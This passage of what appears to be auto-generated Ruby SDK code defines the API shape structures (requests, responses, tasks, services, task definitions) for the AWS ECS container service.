DiscoverPollEndpointResponse.add_member(:telemetry_endpoint, Shapes::ShapeRef.new(shape: String, location_name: "telemetryEndpoint"))
DiscoverPollEndpointResponse.struct_class = Types::DiscoverPollEndpointResponse
DockerLabelsMap.key = Shapes::ShapeRef.new(shape: String)
DockerLabelsMap.value = Shapes::ShapeRef.new(shape: String)
EnvironmentVariables.member = Shapes::ShapeRef.new(shape: KeyValuePair)
Failure.add_member(:arn, Shapes::ShapeRef.new(shape: String, location_name: "arn"))
Failure.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
Failure.struct_class = Types::Failure
Failures.member = Shapes::ShapeRef.new(shape: Failure)
HealthCheck.add_member(:command, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "command"))
HealthCheck.add_member(:interval, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "interval"))
HealthCheck.add_member(:timeout, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "timeout"))
HealthCheck.add_member(:retries, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "retries"))
HealthCheck.add_member(:start_period, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "startPeriod"))
HealthCheck.struct_class = Types::HealthCheck
HostEntry.add_member(:hostname, Shapes::ShapeRef.new(shape: String, required: true, location_name: "hostname"))
HostEntry.add_member(:ip_address, Shapes::ShapeRef.new(shape: String, required: true, location_name: "ipAddress"))
HostEntry.struct_class = Types::HostEntry
HostEntryList.member = Shapes::ShapeRef.new(shape: HostEntry)
HostVolumeProperties.add_member(:source_path, Shapes::ShapeRef.new(shape: String, location_name: "sourcePath"))
HostVolumeProperties.struct_class = Types::HostVolumeProperties
KernelCapabilities.add_member(:add, Shapes::ShapeRef.new(shape: StringList, location_name: "add"))
KernelCapabilities.add_member(:drop, Shapes::ShapeRef.new(shape: StringList, location_name: "drop"))
KernelCapabilities.struct_class = Types::KernelCapabilities
KeyValuePair.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
KeyValuePair.add_member(:value, Shapes::ShapeRef.new(shape: String, location_name: "value"))
KeyValuePair.struct_class = Types::KeyValuePair
LinuxParameters.add_member(:capabilities, Shapes::ShapeRef.new(shape: KernelCapabilities, location_name: "capabilities"))
LinuxParameters.add_member(:devices, Shapes::ShapeRef.new(shape: DevicesList, location_name: "devices"))
LinuxParameters.add_member(:init_process_enabled, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "initProcessEnabled"))
LinuxParameters.add_member(:shared_memory_size, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "sharedMemorySize"))
LinuxParameters.add_member(:tmpfs, Shapes::ShapeRef.new(shape: TmpfsList, location_name: "tmpfs"))
LinuxParameters.struct_class = Types::LinuxParameters
ListAttributesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListAttributesRequest.add_member(:target_type, Shapes::ShapeRef.new(shape: TargetType, required: true, location_name: "targetType"))
ListAttributesRequest.add_member(:attribute_name, Shapes::ShapeRef.new(shape: String, location_name: "attributeName"))
ListAttributesRequest.add_member(:attribute_value, Shapes::ShapeRef.new(shape: String, location_name: "attributeValue"))
ListAttributesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListAttributesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListAttributesRequest.struct_class = Types::ListAttributesRequest
ListAttributesResponse.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
ListAttributesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListAttributesResponse.struct_class = Types::ListAttributesResponse
ListClustersRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListClustersRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListClustersRequest.struct_class = Types::ListClustersRequest
ListClustersResponse.add_member(:cluster_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "clusterArns"))
ListClustersResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListClustersResponse.struct_class = Types::ListClustersResponse
ListContainerInstancesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListContainerInstancesRequest.add_member(:filter, Shapes::ShapeRef.new(shape: String, location_name: "filter"))
ListContainerInstancesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListContainerInstancesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListContainerInstancesRequest.add_member(:status, Shapes::ShapeRef.new(shape: ContainerInstanceStatus, location_name: "status"))
ListContainerInstancesRequest.struct_class = Types::ListContainerInstancesRequest
ListContainerInstancesResponse.add_member(:container_instance_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "containerInstanceArns"))
ListContainerInstancesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListContainerInstancesResponse.struct_class = Types::ListContainerInstancesResponse
ListServicesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListServicesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListServicesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListServicesRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
ListServicesRequest.add_member(:scheduling_strategy, Shapes::ShapeRef.new(shape: SchedulingStrategy, location_name: "schedulingStrategy"))
ListServicesRequest.struct_class = Types::ListServicesRequest
ListServicesResponse.add_member(:service_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "serviceArns"))
ListServicesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListServicesResponse.struct_class = Types::ListServicesResponse
ListTaskDefinitionFamiliesRequest.add_member(:family_prefix, Shapes::ShapeRef.new(shape: String, location_name: "familyPrefix"))
ListTaskDefinitionFamiliesRequest.add_member(:status, Shapes::ShapeRef.new(shape: TaskDefinitionFamilyStatus, location_name: "status"))
ListTaskDefinitionFamiliesRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionFamiliesRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListTaskDefinitionFamiliesRequest.struct_class = Types::ListTaskDefinitionFamiliesRequest
ListTaskDefinitionFamiliesResponse.add_member(:families, Shapes::ShapeRef.new(shape: StringList, location_name: "families"))
ListTaskDefinitionFamiliesResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionFamiliesResponse.struct_class = Types::ListTaskDefinitionFamiliesResponse
ListTaskDefinitionsRequest.add_member(:family_prefix, Shapes::ShapeRef.new(shape: String, location_name: "familyPrefix"))
ListTaskDefinitionsRequest.add_member(:status, Shapes::ShapeRef.new(shape: TaskDefinitionStatus, location_name: "status"))
ListTaskDefinitionsRequest.add_member(:sort, Shapes::ShapeRef.new(shape: SortOrder, location_name: "sort"))
ListTaskDefinitionsRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionsRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListTaskDefinitionsRequest.struct_class = Types::ListTaskDefinitionsRequest
ListTaskDefinitionsResponse.add_member(:task_definition_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "taskDefinitionArns"))
ListTaskDefinitionsResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTaskDefinitionsResponse.struct_class = Types::ListTaskDefinitionsResponse
ListTasksRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
ListTasksRequest.add_member(:container_instance, Shapes::ShapeRef.new(shape: String, location_name: "containerInstance"))
ListTasksRequest.add_member(:family, Shapes::ShapeRef.new(shape: String, location_name: "family"))
ListTasksRequest.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTasksRequest.add_member(:max_results, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "maxResults"))
ListTasksRequest.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
ListTasksRequest.add_member(:service_name, Shapes::ShapeRef.new(shape: String, location_name: "serviceName"))
ListTasksRequest.add_member(:desired_status, Shapes::ShapeRef.new(shape: DesiredStatus, location_name: "desiredStatus"))
ListTasksRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
ListTasksRequest.struct_class = Types::ListTasksRequest
ListTasksResponse.add_member(:task_arns, Shapes::ShapeRef.new(shape: StringList, location_name: "taskArns"))
ListTasksResponse.add_member(:next_token, Shapes::ShapeRef.new(shape: String, location_name: "nextToken"))
ListTasksResponse.struct_class = Types::ListTasksResponse
LoadBalancer.add_member(:target_group_arn, Shapes::ShapeRef.new(shape: String, location_name: "targetGroupArn"))
LoadBalancer.add_member(:load_balancer_name, Shapes::ShapeRef.new(shape: String, location_name: "loadBalancerName"))
LoadBalancer.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
LoadBalancer.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
LoadBalancer.struct_class = Types::LoadBalancer
LoadBalancers.member = Shapes::ShapeRef.new(shape: LoadBalancer)
LogConfiguration.add_member(:log_driver, Shapes::ShapeRef.new(shape: LogDriver, required: true, location_name: "logDriver"))
LogConfiguration.add_member(:options, Shapes::ShapeRef.new(shape: LogConfigurationOptionsMap, location_name: "options"))
LogConfiguration.struct_class = Types::LogConfiguration
LogConfigurationOptionsMap.key = Shapes::ShapeRef.new(shape: String)
LogConfigurationOptionsMap.value = Shapes::ShapeRef.new(shape: String)
MountPoint.add_member(:source_volume, Shapes::ShapeRef.new(shape: String, location_name: "sourceVolume"))
MountPoint.add_member(:container_path, Shapes::ShapeRef.new(shape: String, location_name: "containerPath"))
MountPoint.add_member(:read_only, Shapes::ShapeRef.new(shape: BoxedBoolean, location_name: "readOnly"))
MountPoint.struct_class = Types::MountPoint
MountPointList.member = Shapes::ShapeRef.new(shape: MountPoint)
NetworkBinding.add_member(:bind_ip, Shapes::ShapeRef.new(shape: String, location_name: "bindIP"))
NetworkBinding.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
NetworkBinding.add_member(:host_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "hostPort"))
NetworkBinding.add_member(:protocol, Shapes::ShapeRef.new(shape: TransportProtocol, location_name: "protocol"))
NetworkBinding.struct_class = Types::NetworkBinding
NetworkBindings.member = Shapes::ShapeRef.new(shape: NetworkBinding)
NetworkConfiguration.add_member(:awsvpc_configuration, Shapes::ShapeRef.new(shape: AwsVpcConfiguration, location_name: "awsvpcConfiguration"))
NetworkConfiguration.struct_class = Types::NetworkConfiguration
NetworkInterface.add_member(:attachment_id, Shapes::ShapeRef.new(shape: String, location_name: "attachmentId"))
NetworkInterface.add_member(:private_ipv_4_address, Shapes::ShapeRef.new(shape: String, location_name: "privateIpv4Address"))
NetworkInterface.add_member(:ipv6_address, Shapes::ShapeRef.new(shape: String, location_name: "ipv6Address"))
NetworkInterface.struct_class = Types::NetworkInterface
NetworkInterfaces.member = Shapes::ShapeRef.new(shape: NetworkInterface)
PlacementConstraint.add_member(:type, Shapes::ShapeRef.new(shape: PlacementConstraintType, location_name: "type"))
PlacementConstraint.add_member(:expression, Shapes::ShapeRef.new(shape: String, location_name: "expression"))
PlacementConstraint.struct_class = Types::PlacementConstraint
PlacementConstraints.member = Shapes::ShapeRef.new(shape: PlacementConstraint)
PlacementStrategies.member = Shapes::ShapeRef.new(shape: PlacementStrategy)
PlacementStrategy.add_member(:type, Shapes::ShapeRef.new(shape: PlacementStrategyType, location_name: "type"))
PlacementStrategy.add_member(:field, Shapes::ShapeRef.new(shape: String, location_name: "field"))
PlacementStrategy.struct_class = Types::PlacementStrategy
PortMapping.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
PortMapping.add_member(:host_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "hostPort"))
PortMapping.add_member(:protocol, Shapes::ShapeRef.new(shape: TransportProtocol, location_name: "protocol"))
PortMapping.struct_class = Types::PortMapping
PortMappingList.member = Shapes::ShapeRef.new(shape: PortMapping)
PutAttributesRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
PutAttributesRequest.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, required: true, location_name: "attributes"))
PutAttributesRequest.struct_class = Types::PutAttributesRequest
PutAttributesResponse.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
PutAttributesResponse.struct_class = Types::PutAttributesResponse
RegisterContainerInstanceRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
RegisterContainerInstanceRequest.add_member(:instance_identity_document, Shapes::ShapeRef.new(shape: String, location_name: "instanceIdentityDocument"))
RegisterContainerInstanceRequest.add_member(:instance_identity_document_signature, Shapes::ShapeRef.new(shape: String, location_name: "instanceIdentityDocumentSignature"))
RegisterContainerInstanceRequest.add_member(:total_resources, Shapes::ShapeRef.new(shape: Resources, location_name: "totalResources"))
RegisterContainerInstanceRequest.add_member(:version_info, Shapes::ShapeRef.new(shape: VersionInfo, location_name: "versionInfo"))
RegisterContainerInstanceRequest.add_member(:container_instance_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerInstanceArn"))
RegisterContainerInstanceRequest.add_member(:attributes, Shapes::ShapeRef.new(shape: Attributes, location_name: "attributes"))
RegisterContainerInstanceRequest.struct_class = Types::RegisterContainerInstanceRequest
RegisterContainerInstanceResponse.add_member(:container_instance, Shapes::ShapeRef.new(shape: ContainerInstance, location_name: "containerInstance"))
RegisterContainerInstanceResponse.struct_class = Types::RegisterContainerInstanceResponse
RegisterTaskDefinitionRequest.add_member(:family, Shapes::ShapeRef.new(shape: String, required: true, location_name: "family"))
RegisterTaskDefinitionRequest.add_member(:task_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskRoleArn"))
RegisterTaskDefinitionRequest.add_member(:execution_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "executionRoleArn"))
RegisterTaskDefinitionRequest.add_member(:network_mode, Shapes::ShapeRef.new(shape: NetworkMode, location_name: "networkMode"))
RegisterTaskDefinitionRequest.add_member(:container_definitions, Shapes::ShapeRef.new(shape: ContainerDefinitions, required: true, location_name: "containerDefinitions"))
RegisterTaskDefinitionRequest.add_member(:volumes, Shapes::ShapeRef.new(shape: VolumeList, location_name: "volumes"))
RegisterTaskDefinitionRequest.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraints, location_name: "placementConstraints"))
RegisterTaskDefinitionRequest.add_member(:requires_compatibilities, Shapes::ShapeRef.new(shape: CompatibilityList, location_name: "requiresCompatibilities"))
RegisterTaskDefinitionRequest.add_member(:cpu, Shapes::ShapeRef.new(shape: String, location_name: "cpu"))
RegisterTaskDefinitionRequest.add_member(:memory, Shapes::ShapeRef.new(shape: String, location_name: "memory"))
RegisterTaskDefinitionRequest.struct_class = Types::RegisterTaskDefinitionRequest
RegisterTaskDefinitionResponse.add_member(:task_definition, Shapes::ShapeRef.new(shape: TaskDefinition, location_name: "taskDefinition"))
RegisterTaskDefinitionResponse.struct_class = Types::RegisterTaskDefinitionResponse
RepositoryCredentials.add_member(:credentials_parameter, Shapes::ShapeRef.new(shape: String, required: true, location_name: "credentialsParameter"))
RepositoryCredentials.struct_class = Types::RepositoryCredentials
RequiresAttributes.member = Shapes::ShapeRef.new(shape: Attribute)
Resource.add_member(:name, Shapes::ShapeRef.new(shape: String, location_name: "name"))
Resource.add_member(:type, Shapes::ShapeRef.new(shape: String, location_name: "type"))
Resource.add_member(:double_value, Shapes::ShapeRef.new(shape: Double, location_name: "doubleValue"))
Resource.add_member(:long_value, Shapes::ShapeRef.new(shape: Long, location_name: "longValue"))
Resource.add_member(:integer_value, Shapes::ShapeRef.new(shape: Integer, location_name: "integerValue"))
Resource.add_member(:string_set_value, Shapes::ShapeRef.new(shape: StringList, location_name: "stringSetValue"))
Resource.struct_class = Types::Resource
Resources.member = Shapes::ShapeRef.new(shape: Resource)
RunTaskRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
RunTaskRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
RunTaskRequest.add_member(:overrides, Shapes::ShapeRef.new(shape: TaskOverride, location_name: "overrides"))
RunTaskRequest.add_member(:count, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "count"))
RunTaskRequest.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
RunTaskRequest.add_member(:group, Shapes::ShapeRef.new(shape: String, location_name: "group"))
RunTaskRequest.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: PlacementConstraints, location_name: "placementConstraints"))
RunTaskRequest.add_member(:placement_strategy, Shapes::ShapeRef.new(shape: PlacementStrategies, location_name: "placementStrategy"))
RunTaskRequest.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
RunTaskRequest.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
RunTaskRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
RunTaskRequest.struct_class = Types::RunTaskRequest
RunTaskResponse.add_member(:tasks, Shapes::ShapeRef.new(shape: Tasks, location_name: "tasks"))
RunTaskResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
RunTaskResponse.struct_class = Types::RunTaskResponse
Service.add_member(:service_arn, Shapes::ShapeRef.new(shape: String, location_name: "serviceArn"))
Service.add_member(:service_name, Shapes::ShapeRef.new(shape: String, location_name: "serviceName"))
Service.add_member(:cluster_arn, Shapes::ShapeRef.new(shape: String, location_name: "clusterArn"))
Service.add_member(:load_balancers, Shapes::ShapeRef.new(shape: LoadBalancers, location_name: "loadBalancers"))
Service.add_member(:service_registries, Shapes::ShapeRef.new(shape: ServiceRegistries, location_name: "serviceRegistries"))
Service.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
Service.add_member(:desired_count, Shapes::ShapeRef.new(shape: Integer, location_name: "desiredCount"))
Service.add_member(:running_count, Shapes::ShapeRef.new(shape: Integer, location_name: "runningCount"))
Service.add_member(:pending_count, Shapes::ShapeRef.new(shape: Integer, location_name: "pendingCount"))
Service.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
Service.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
Service.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinition"))
Service.add_member(:deployment_configuration, Shapes::ShapeRef.new(shape: DeploymentConfiguration, location_name: "deploymentConfiguration"))
Service.add_member(:deployments, Shapes::ShapeRef.new(shape: Deployments, location_name: "deployments"))
Service.add_member(:role_arn, Shapes::ShapeRef.new(shape: String, location_name: "roleArn"))
Service.add_member(:events, Shapes::ShapeRef.new(shape: ServiceEvents, location_name: "events"))
Service.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
Service.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: PlacementConstraints, location_name: "placementConstraints"))
Service.add_member(:placement_strategy, Shapes::ShapeRef.new(shape: PlacementStrategies, location_name: "placementStrategy"))
Service.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
Service.add_member(:health_check_grace_period_seconds, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "healthCheckGracePeriodSeconds"))
Service.add_member(:scheduling_strategy, Shapes::ShapeRef.new(shape: SchedulingStrategy, location_name: "schedulingStrategy"))
Service.struct_class = Types::Service
ServiceEvent.add_member(:id, Shapes::ShapeRef.new(shape: String, location_name: "id"))
ServiceEvent.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
ServiceEvent.add_member(:message, Shapes::ShapeRef.new(shape: String, location_name: "message"))
ServiceEvent.struct_class = Types::ServiceEvent
ServiceEvents.member = Shapes::ShapeRef.new(shape: ServiceEvent)
ServiceRegistries.member = Shapes::ShapeRef.new(shape: ServiceRegistry)
ServiceRegistry.add_member(:registry_arn, Shapes::ShapeRef.new(shape: String, location_name: "registryArn"))
ServiceRegistry.add_member(:port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "port"))
ServiceRegistry.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
ServiceRegistry.add_member(:container_port, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "containerPort"))
ServiceRegistry.struct_class = Types::ServiceRegistry
Services.member = Shapes::ShapeRef.new(shape: Service)
StartTaskRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
StartTaskRequest.add_member(:task_definition, Shapes::ShapeRef.new(shape: String, required: true, location_name: "taskDefinition"))
StartTaskRequest.add_member(:overrides, Shapes::ShapeRef.new(shape: TaskOverride, location_name: "overrides"))
StartTaskRequest.add_member(:container_instances, Shapes::ShapeRef.new(shape: StringList, required: true, location_name: "containerInstances"))
StartTaskRequest.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
StartTaskRequest.add_member(:group, Shapes::ShapeRef.new(shape: String, location_name: "group"))
StartTaskRequest.add_member(:network_configuration, Shapes::ShapeRef.new(shape: NetworkConfiguration, location_name: "networkConfiguration"))
StartTaskRequest.struct_class = Types::StartTaskRequest
StartTaskResponse.add_member(:tasks, Shapes::ShapeRef.new(shape: Tasks, location_name: "tasks"))
StartTaskResponse.add_member(:failures, Shapes::ShapeRef.new(shape: Failures, location_name: "failures"))
StartTaskResponse.struct_class = Types::StartTaskResponse
Statistics.member = Shapes::ShapeRef.new(shape: KeyValuePair)
StopTaskRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
StopTaskRequest.add_member(:task, Shapes::ShapeRef.new(shape: String, required: true, location_name: "task"))
StopTaskRequest.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
StopTaskRequest.struct_class = Types::StopTaskRequest
StopTaskResponse.add_member(:task, Shapes::ShapeRef.new(shape: Task, location_name: "task"))
StopTaskResponse.struct_class = Types::StopTaskResponse
StringList.member = Shapes::ShapeRef.new(shape: String)
SubmitContainerStateChangeRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
SubmitContainerStateChangeRequest.add_member(:task, Shapes::ShapeRef.new(shape: String, location_name: "task"))
SubmitContainerStateChangeRequest.add_member(:container_name, Shapes::ShapeRef.new(shape: String, location_name: "containerName"))
SubmitContainerStateChangeRequest.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
SubmitContainerStateChangeRequest.add_member(:exit_code, Shapes::ShapeRef.new(shape: BoxedInteger, location_name: "exitCode"))
SubmitContainerStateChangeRequest.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
SubmitContainerStateChangeRequest.add_member(:network_bindings, Shapes::ShapeRef.new(shape: NetworkBindings, location_name: "networkBindings"))
SubmitContainerStateChangeRequest.struct_class = Types::SubmitContainerStateChangeRequest
SubmitContainerStateChangeResponse.add_member(:acknowledgment, Shapes::ShapeRef.new(shape: String, location_name: "acknowledgment"))
SubmitContainerStateChangeResponse.struct_class = Types::SubmitContainerStateChangeResponse
SubmitTaskStateChangeRequest.add_member(:cluster, Shapes::ShapeRef.new(shape: String, location_name: "cluster"))
SubmitTaskStateChangeRequest.add_member(:task, Shapes::ShapeRef.new(shape: String, location_name: "task"))
SubmitTaskStateChangeRequest.add_member(:status, Shapes::ShapeRef.new(shape: String, location_name: "status"))
SubmitTaskStateChangeRequest.add_member(:reason, Shapes::ShapeRef.new(shape: String, location_name: "reason"))
SubmitTaskStateChangeRequest.add_member(:containers, Shapes::ShapeRef.new(shape: ContainerStateChanges, location_name: "containers"))
SubmitTaskStateChangeRequest.add_member(:attachments, Shapes::ShapeRef.new(shape: AttachmentStateChanges, location_name: "attachments"))
SubmitTaskStateChangeRequest.add_member(:pull_started_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStartedAt"))
SubmitTaskStateChangeRequest.add_member(:pull_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStoppedAt"))
SubmitTaskStateChangeRequest.add_member(:execution_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "executionStoppedAt"))
SubmitTaskStateChangeRequest.struct_class = Types::SubmitTaskStateChangeRequest
SubmitTaskStateChangeResponse.add_member(:acknowledgment, Shapes::ShapeRef.new(shape: String, location_name: "acknowledgment"))
SubmitTaskStateChangeResponse.struct_class = Types::SubmitTaskStateChangeResponse
Task.add_member(:task_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskArn"))
Task.add_member(:cluster_arn, Shapes::ShapeRef.new(shape: String, location_name: "clusterArn"))
Task.add_member(:task_definition_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinitionArn"))
Task.add_member(:container_instance_arn, Shapes::ShapeRef.new(shape: String, location_name: "containerInstanceArn"))
Task.add_member(:overrides, Shapes::ShapeRef.new(shape: TaskOverride, location_name: "overrides"))
Task.add_member(:last_status, Shapes::ShapeRef.new(shape: String, location_name: "lastStatus"))
Task.add_member(:desired_status, Shapes::ShapeRef.new(shape: String, location_name: "desiredStatus"))
Task.add_member(:cpu, Shapes::ShapeRef.new(shape: String, location_name: "cpu"))
Task.add_member(:memory, Shapes::ShapeRef.new(shape: String, location_name: "memory"))
Task.add_member(:containers, Shapes::ShapeRef.new(shape: Containers, location_name: "containers"))
Task.add_member(:started_by, Shapes::ShapeRef.new(shape: String, location_name: "startedBy"))
Task.add_member(:version, Shapes::ShapeRef.new(shape: Long, location_name: "version"))
Task.add_member(:stopped_reason, Shapes::ShapeRef.new(shape: String, location_name: "stoppedReason"))
Task.add_member(:connectivity, Shapes::ShapeRef.new(shape: Connectivity, location_name: "connectivity"))
Task.add_member(:connectivity_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "connectivityAt"))
Task.add_member(:pull_started_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStartedAt"))
Task.add_member(:pull_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "pullStoppedAt"))
Task.add_member(:execution_stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "executionStoppedAt"))
Task.add_member(:created_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "createdAt"))
Task.add_member(:started_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "startedAt"))
Task.add_member(:stopping_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "stoppingAt"))
Task.add_member(:stopped_at, Shapes::ShapeRef.new(shape: Timestamp, location_name: "stoppedAt"))
Task.add_member(:group, Shapes::ShapeRef.new(shape: String, location_name: "group"))
Task.add_member(:launch_type, Shapes::ShapeRef.new(shape: LaunchType, location_name: "launchType"))
Task.add_member(:platform_version, Shapes::ShapeRef.new(shape: String, location_name: "platformVersion"))
Task.add_member(:attachments, Shapes::ShapeRef.new(shape: Attachments, location_name: "attachments"))
Task.add_member(:health_status, Shapes::ShapeRef.new(shape: HealthStatus, location_name: "healthStatus"))
Task.struct_class = Types::Task
TaskDefinition.add_member(:task_definition_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskDefinitionArn"))
TaskDefinition.add_member(:container_definitions, Shapes::ShapeRef.new(shape: ContainerDefinitions, location_name: "containerDefinitions"))
TaskDefinition.add_member(:family, Shapes::ShapeRef.new(shape: String, location_name: "family"))
TaskDefinition.add_member(:task_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "taskRoleArn"))
TaskDefinition.add_member(:execution_role_arn, Shapes::ShapeRef.new(shape: String, location_name: "executionRoleArn"))
TaskDefinition.add_member(:network_mode, Shapes::ShapeRef.new(shape: NetworkMode, location_name: "networkMode"))
TaskDefinition.add_member(:revision, Shapes::ShapeRef.new(shape: Integer, location_name: "revision"))
TaskDefinition.add_member(:volumes, Shapes::ShapeRef.new(shape: VolumeList, location_name: "volumes"))
TaskDefinition.add_member(:status, Shapes::ShapeRef.new(shape: TaskDefinitionStatus, location_name: "status"))
TaskDefinition.add_member(:requires_attributes, Shapes::ShapeRef.new(shape: RequiresAttributes, location_name: "requiresAttributes"))
TaskDefinition.add_member(:placement_constraints, Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraints, location_name: "placementConstraints"))
TaskDefinition.add_member(:compatibilities, Shapes::ShapeRef.new(shape: CompatibilityList, location_name: "compatibilities"))
TaskDefinition.add_member(:requires_compatibilities, Shapes::ShapeRef.new(shape: CompatibilityList, location_name: "requiresCompatibilities"))
TaskDefinition.add_member(:cpu, Shapes::ShapeRef.new(shape: String, location_name: "cpu"))
TaskDefinition.add_member(:memory, Shapes::ShapeRef.new(shape: String, location_name: "memory"))
TaskDefinition.struct_class = Types::TaskDefinition
TaskDefinitionPlacementConstraint.add_member(:type, Shapes::ShapeRef.new(shape: TaskDefinitionPlacementConstraintType, location_name: "type"))
TaskDefinitionPlacementConstraint.add_member(:expression, Shapes::ShapeRef.new(shape: String, location_name: "expression"))
